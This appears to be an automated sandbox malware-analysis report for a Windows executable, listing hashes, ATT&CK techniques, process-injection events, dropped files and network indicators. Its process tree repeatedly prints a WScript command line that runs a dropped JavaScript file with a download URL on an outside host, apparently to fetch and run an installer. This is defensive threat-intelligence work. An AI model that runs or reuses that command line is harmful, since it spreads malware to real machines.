5b6412e0de7fe5473b6bbe51f91cf84497d5516d3a5d717e3b3700b60167fe8e

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
15-05-2024 03:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe
Size

184KB
MD5

4447f1352c2ceaa7bdfdf8df7a5ec30c
SHA1

46721f2810edc1477d076a2fceae717f56f6d22d
SHA256

5b6412e0de7fe5473b6bbe51f91cf84497d5516d3a5d717e3b3700b60167fe8e
SHA512

21a2e19dc6e40c4b606c61002ff9de1521ee52cbd0efc736771e3d3512182e20b7f5408c27cf5e1a8ee59f05c974028805e07eea4c7a98df70354008e7cb292a
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3k:/7BSH8zUB+nGESaaRvoB7FJNndnl

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	3056	WScript.exe
8	3056	WScript.exe
10	3056	WScript.exe
12	2484	WScript.exe
13	2484	WScript.exe
15	2764	WScript.exe
16	2764	WScript.exe
18	276	WScript.exe
19	276	WScript.exe
21	2412	WScript.exe
22	2412	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1760 wrote to memory of 3056	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	28
PID 1760 wrote to memory of 3056	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	28
PID 1760 wrote to memory of 3056	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	28
PID 1760 wrote to memory of 3056	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	28
PID 1760 wrote to memory of 2484	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2484	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2484	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2484	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2764	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	32
PID 1760 wrote to memory of 2764	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	32
PID 1760 wrote to memory of 2764	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	32
PID 1760 wrote to memory of 2764	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	32
PID 1760 wrote to memory of 276	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	34
PID 1760 wrote to memory of 276	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	34
PID 1760 wrote to memory of 276	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	34
PID 1760 wrote to memory of 276	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	34
PID 1760 wrote to memory of 2412	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	36
PID 1760 wrote to memory of 2412	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	36
PID 1760 wrote to memory of 2412	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	36
PID 1760 wrote to memory of 2412	1760	4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\4447f1352c2ceaa7bdfdf8df7a5ec30c_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1760
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1B5D.js" http://www.djapp.info/?domain=rjmmkEVTTz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1B5D.exe
  2⤵
  - Blocklisted process makes network request
  PID:3056
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1B5D.js" http://www.djapp.info/?domain=rjmmkEVTTz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1B5D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2484
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1B5D.js" http://www.djapp.info/?domain=rjmmkEVTTz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1B5D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2764
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1B5D.js" http://www.djapp.info/?domain=rjmmkEVTTz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1B5D.exe
  2⤵
  - Blocklisted process makes network request
  PID:276
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1B5D.js" http://www.djapp.info/?domain=rjmmkEVTTz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1B5D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
b3da7ba05a9182c567209d501275b1e4

SHA1
530c1a66087fc6b80e4f0ea9fcd86d0a514fd794

SHA256
200f8737d95e4825bc0a41101f6f385fe8264f18d59535e2fd033dced394414c

SHA512
eb5916e11b97c78be9c06d28d53e735513aed16af57513e33d758ba7244e3b3cea55fd52175e52caa4c67beb38b268a62ffaeff495467ee9f69ed1097db193da

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
fc5c9a7304856852da5e268ccf31f0d4

SHA1
ec3a1bbba8e82e455eba57bea91dea6c420da6a0

SHA256
c0024c62417cf6599ca611abf6098d27b45e61be52c256669f3049525be63fcb

SHA512
c84a9fc3d1fa3fe4ecc80fbd59a8120cfc6338eba1dc2188a523eb5b8521f0e029041818d0d3c352add7ee063052c9062e9e19fb295b45fe5657721bd4139b2c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a226dfd5537df792e49b0c270c9c6fcd

SHA1
b8fae66003840fcd51832fc366245c89399c3c67

SHA256
afe4b5e522188192f020d4b653b15c8e23395291807d3dd568131606c8393113

SHA512
a2a13ebfbb9d23c76d71b825e75b73e2b4e7171aedd795788324eda9bcd2f14742146f1a1d04590f1ee66c536e5dfc2846a3066702945796f09b81e7029c4955

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
68603d6acc8ffe3b90a67cd66977de71

SHA1
4a07532857ea1798530c0fbb4604cf4ee9278cfe

SHA256
38271884278a8e989e10705858d2bd4a3db54060e11c75201ab2cb3699833a8d

SHA512
ba76776c370c314f7a085e94cc14b1573400b979c2c648696d3404e2aba38f9db92bd54846eb7bb0d36372e92e559557ddc8e3bef2af7af28c2b619e8b01a667

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
6KB

MD5
caf2d70c7e07f809f0aedeef01cb27b3

SHA1
544e260f8b4eafd935a8fac313f7524ade7a5d89

SHA256
31f8b110d82e6ea30e354eace8f2dd16c3929fe4c5e26009bcfaeaa40be5ac0d

SHA512
d50048208c6f23dfdf587fbe5e6ca2c501c41e67f4289bb7b830e656595ef3708e2a5edcc28a3d40d71cd11db2aaa7961a625e51061fd4f9f63b3911fe637e44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
6KB

MD5
f7c9cb288cf73f63ce88679e2354ed59

SHA1
b1aa5305944c72d9483a95001a7f9d86bf345006

SHA256
d1e5c9831d973de4c999027c29003d61db33123d014eada338476fcc0569be84

SHA512
db305d9b91d55774b461acc30c5ff38d981813f21b99d7e4c14cd1c36ab02a60fba10f5ea675520d5aea0a83fed715a24648956342fdd38f825bf1de4b51b87a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
6KB

MD5
4eda6f9f74686099efdd71ed7a5efeb4

SHA1
0cd0946b0e623f73b6f8a7d39b3b569ac4c92653

SHA256
93d2ee2c253051496b1843632deb5f6c0ceeb545fab4995e84151ff55592b8a0

SHA512
6d8ec3433ed1dc8589ebccf56eeed249b8399fdfac90b9e939f279dcf1816290e80f83d377ef13858816b920d1af5e3dcc038e09a255365545f8934fc6e39d9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
6KB

MD5
fc2d83f91d8e8843e2db8de7e8e51d1b

SHA1
46580b9e2da2f62378a65ea9b152931899dcf099

SHA256
9d26b0c8851ce9e36c7922711be2c25c462ba69a677d121a6c4411c21454b01e

SHA512
1bffd43466cb485696ccf798cdcfa0b586f72093714147c0ca586d6fb35d4d80e2217b34a1cd852ae1eda6aed5a214902e81789e0964310dbe75b70afafb345d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4A88.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar62E9.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf1B5D.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6T2N0HJ5.txt

Filesize
177B

MD5
05200b4ad1a5b1e336b020aa481849e8

SHA1
a566f2544b8227d4b988a791e198f75a7e4e9657

SHA256
beda23dfac9cd56761467a7544588f02ab0c14fe298f2d430bb0c4ebfccee205

SHA512
9f7dabb76f35a278ebdec696e6aa4874bcc534cfb219e53017c74ed07244ab3d322158e29bc3635903616880c642f18022e98224209d108877e2f7604f4917a4

Download Submit